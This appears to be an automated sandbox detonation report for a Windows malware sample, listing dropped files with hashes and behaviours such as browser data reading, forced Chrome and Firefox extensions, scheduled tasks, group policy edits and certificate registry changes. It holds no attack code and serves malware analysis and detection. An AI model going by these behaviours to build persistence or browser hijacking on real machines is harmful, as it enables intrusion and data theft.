SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 2eed991e6e31d306e68ef64d773d3e16
SHA1 27b5035255d679a7015d1a2e5bfcc5f124160689
SHA256 3b839645035f3ad69591e7e9db4967a695877782e57703ee61d64eeb11be7fa1
SHA512 d124006d52504010a7dd99599e58b026c28febe793e77609b6151152a7d3765cc52f3fec504680f7d9b08e183d3190858580c7035f9d95990292241535d40404

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\orRvbnhdU\BoIyvtW.xml

MD5 ef079aaef1f906e42885bbc7d4d35de0
SHA1 72a4a1e024062fb94baf95a8a9369a21a7dd0ce6
SHA256 73f9e05dcb26f2e9091df88bfefb24d6c3ca93d8c1ca25ed3c17e25c7191ecf3
SHA512 31214f2d81c28e25030e19d355b13a004d82c4e9180b93c9775d268d5666f72591bc17f117c006f5632ebd713a107562c8df65feadc33084cf63db399c933b72

C:\Program Files (x86)\YrliKKkuhgWU2\vqoJCaF.xml

MD5 24d95524410ce69f7d00cbb177e7063a
SHA1 0e3f50d0460d2e080de165e6cebec882b0ba8c66
SHA256 6ce6ff73a40b18b9a80b6f50f58737d2a086495f55f0e6be5c83975eea7a356b
SHA512 395b66a348a61a329967c04ccc588b2aac1ff2e629d372ae95f2bcf405978c17aada726137a2fdc55f70f86c7fca89c6359474cc01c5bdee25ce0469d18669dd

C:\ProgramData\qgjSpVnHOWlNdqVB\UTmTfNY.xml

MD5 d188cd4730ba590320b50f713f226c15
SHA1 54ead28d533e6f83caf4e67803a6df5122765f39
SHA256 b6a8fdea0faf9e3aee8d8b78bbdf72a32ca1487882337dffb1ca6998b04a2d12
SHA512 95c0e266a39cbec9a76676ee39073f11a317f7cbac0725d47bed95ea05f26883e1aaed1159be1714eaae613264cfc3dd369702d42c216e7b41e43ee13158b6b4

C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\dbotFoU.xml

MD5 ac468f310e3b41f01c4f5b01b5eb6ebd
SHA1 46b754310373f471d3416007f93625a36ada51cc
SHA256 fa0ba5ab1115cd219b12907d9d8371b76e6406ab592e2016a49e7006825531ef
SHA512 1d255cf9da83ea0784af636b1872edd860d6de44df6a8c2e6731ea01d89a6b7dace6c939e2a73d0a0bbdfcec52f8aab95e4afb3805c12be60d90051ebfb2d848

C:\Program Files (x86)\ycfBUKIjHxeOC\DSqYrZi.xml

MD5 7ced44a4597f84a3465330016b6ae6c2
SHA1 f51191faa614fd36c966a581b57a184c9ccdeea7
SHA256 8506fcdf097b836180c54c6b67d1433cd48d0dbb9fd231b0929408e85bbe935d
SHA512 fa2c85423fd69d5c4e8fcacdfe8751d32cd1b147e3619272cbbf038584b8856a7fc5003503aeb4b74cffdbb1cd9cd4a794ea5b10ae077c8d8cf2f815921ce5c5

C:\Windows\Temp\lwSRcZKonRlOofsg\ikuFnJEA\uKkhvGx.dll

MD5 db0e0228f220bd8fa3b45a0043744456
SHA1 e287442ab5c21cab796c6893a34f0474820b6515
SHA256 9d17deafa6484b95a25345472c61bfbf7c510b4fafd2a52e7806db27ec4a6883
SHA512 a6d1aa8dc12f47ca1b9781264f02a4058287eb3bca0033ec9c3d3bd4adc9e3ac87c6bfcb361dc90ea40c056e0a9f29a28c7454afef5233a11c13c5c40d35f763

memory/4628-502-0x0000000003780000-0x0000000003803000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3e5zl51i.default-release\prefs.js

MD5 b9d29e6b972000e5a0a8f23aa2b59474
SHA1 c8fc5f29e2f3e0b24effe96e34725bbdb63205c7
SHA256 ff995a3116e33ace0876cab389c16288acf9ae51e11c1951fabae69c9d4bb2a8
SHA512 5d48e156462a397eaa3d510f4c7030b396ac3936066ed1f612be92231b1d831ff9e0bde04af741b55f5ac13d9c34fd072b260b9b53a9e981c2bf39dd275b4991

memory/4628-517-0x0000000003810000-0x00000000038DF000-memory.dmp

memory/4948-519-0x0000000001AE0000-0x00000000020B3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f7e4d801190784fab27905b5a1e7647c
SHA1 58d89d1529c012611d697ad8bc7c89b118ec890f
SHA256 985c2914e0ababa35f526951fdf1126f1a62151c230a2681a5bde10c395b0143
SHA512 351ada10a303c11a9ca44bbd474d7991efc28bb5aa840153a2d6c435a5f6f45e1d1b762ab037919def8b3c39de358018a2df67b0ab171533afbe6590144d1c00

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 71766891f1f2e0fea4dec97395dd444d
SHA1 a7e3c9f0721698f70b6287359c9ccbf646660435
SHA256 a2489f5e8f06027cbe8b8bc2d4ac6cd422358a782718b2b119c130bd116558a3
SHA512 f5a6c615c2b3046053a7cdb2a3ab02b8aa2af9839e4f922bfb8c8f66fa0abda6a3818a58e87d82ceeee3ef67c34673dcceb34409eb17980f2e0e0728f5c6918e

memory/3208-576-0x0000000000E30000-0x00000000014EE000-memory.dmp

memory/4628-581-0x00000000009F0000-0x00000000010AE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-07 17:00

Reported

2024-04-07 17:03

Platform

win11-20240221-en

Max time kernel

141s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\YrliKKkuhgWU2\IDhYlhm.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\ycfBUKIjHxeOC\wxdYbvp.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\ycfBUKIjHxeOC\PxTyDEW.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\YrliKKkuhgWU2\bICytrPDqVyEw.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\XWITLon.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\orRvbnhdU\IyrDVE.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\rkxrljj.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\orRvbnhdU\HJtjZab.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
File created C:\Program Files (x86)\IgAQuzzvNCUn\wvuTXUU.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bEcIFlOHxifjjBuFoU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\aUYdFpynDtMaquqaO.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\yozVwwMRZiDXbVH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\YGcJOiVocZfwUgdee.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "2" C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
